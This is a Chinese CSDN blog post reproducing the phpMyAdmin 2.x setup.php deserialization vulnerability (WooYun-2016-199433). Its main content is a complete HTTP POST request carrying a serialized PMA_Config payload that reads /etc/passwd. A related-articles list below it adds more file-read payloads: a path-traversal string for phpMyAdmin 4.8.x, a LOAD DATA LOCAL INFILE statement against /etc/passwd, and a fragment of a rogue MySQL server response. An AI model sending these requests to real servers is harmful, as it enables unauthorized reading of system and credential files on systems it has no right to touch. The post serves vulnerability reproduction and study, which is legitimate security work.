phpMyAdmin 2.x版本任意文件读取

最新推荐文章于 2021-12-08 14:00:00 发布
最新推荐文章于 2021-12-08 14:00:00 发布
阅读量894 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: phpMyAdmin 文件读取
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/86543485
版权

0x01 简介

phpmyadmin scripts/setup.php 页面存在反序列化漏洞(WooYun-2016-199433)
phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

0x02 漏洞复现

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ip:8080/scripts/setup.php
Cookie: phpMyAdmin=5160933e2be04f36fccdd4695d6dbef3; pma_lang=zh_CN
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

在这里插入图片描述

PhpMyAdmin漏洞介绍
weixin_45253622的博客
03-19 3413
获取网站绝对路径,
PHPMYADMIN渗透总结
sinat_30599967的博客
02-15 1276
phpmyadmin介绍 phpmyadmin是一个以php为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可以使用Web接口管理MySQL数据库。借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表 phpmyadmin安全测试流程: 确认phpmyadmin的后台 确定版本,信息搜集 漏洞利用 实例1 WooYun-2016-199433 -phpmyadmin-反序列化-getsh
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 406
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
cj_Hydra's Blog
04-23 1659
前言: 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...
GWCTF 2019]我有一个数据库 phpmyadmin任意文件读取
shannidawang的博客
09-25 374
phpmyadmin任意文件读取 进入phpmyadmin phpmyadmin4.8.0-4.8.1存在文件包含漏洞 直接上payload读取passwd文件 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 读取成功,尝试读取flag文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag ...
安全开发-PHPMyadmin任意文件读取脚本编写
wjq18827615690的博客
01-31 239
https://laosec.cn/2021/01/27/%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91-PHPMyadmin%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/
mysql phpmyadmin文件_瑞丽网MYSQL弱口令(phpMyAdmin对外开放,可读写文件)
weixin_39778400的博客
01-21 165
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:...
Adminer≤4.6.2任意文件读取漏洞1
08-03
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\...
phpMyAdmin 4.7.x CSRF 漏洞利用
xiaoi123的博客
06-13 1177
作者:AmbulongphpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。该篇文章我们将结合VulnSpy的在线phpMyAdmin环境来熟悉该漏洞的利用。在线 phpMyAdmin CSRF 演练地址:http...
phpMyAdmin漏洞安全防范
willow_liang的博客
11-28 1529
1.主要功能 数据库在线管理工具 操作数据. 执行mysq|命令 导出和导入数据库 网页版的mysq|管理工具 2.危害 MySQL数据库导出(数据库拖库) 执行导出Webshell 修改数据库 3.phpMyAdmin渗透利用思路 MySQL root密码暴力破解 源代码泄露 读取配置文件 root账号及权限三种方法获取Webshell SQLMAP直连数据库获取权限 社工方法来获取权限 4.phpMyAdmin防范思路 重命名文件夹. 禁止列目录漏洞 设置数据库高强度密
phpMyAdmin-2.11.9.2
10-11
phpMyAdmin-2.11.9.2 不错的管理MYSQL by PHP工具
phpMyAdmin-2.11.11-all-languages
07-09
phpMyAdmin-2.11.11-all-languages phpMyAdmin-2.11.11-all-languages phpMyAdmin-2.11.11-all-languages
phpMyAdmin-2.11.2.2-all-languages
11-22
phpMyAdmin-2.11.2.2-all-languages
phpmyadmin 2.11.6 精简版
05-05
精简版本,保留简体中文gb2312和简体中文utf-8两种语言。另外去掉了注释和一些不用的文件。 压缩包300kb. 比官方的小多了。 功能主要去掉了现在不用的mysql引擎和文档。保留了innodb. @copyright 2008 http://hi.baidu.com/sleets
支持PHP5.2的phpMyAdmin 官方最终版
01-05
支持PHP5.2的phpMyAdmin 官方最终版, 4.0 以上的其他版本已经不再支持PHP5.2了,保存留个纪念吧!
Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)
jammny
11-28 1296
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
PhpMyadmin任意文件读取漏洞
cnbird's blog
11-07 5739
libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need
phpmyadmin 无法读取文件
weixin_34252686的博客
04-17 146
为什么80%的码农都做不了架构师?>>> ...
PHPMyAdmin 3.x及以上配置与安装教程
本文档详细介绍了如何在PHPMyAdmin 3.X及更高版本中进行配置并进行安装。PHPMyAdmin是一个流行的开源工具,用于管理和操作MySQL数据库,适用于Web开发人员和系统管理员。以下是安装和配置的关键步骤: 1. **下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值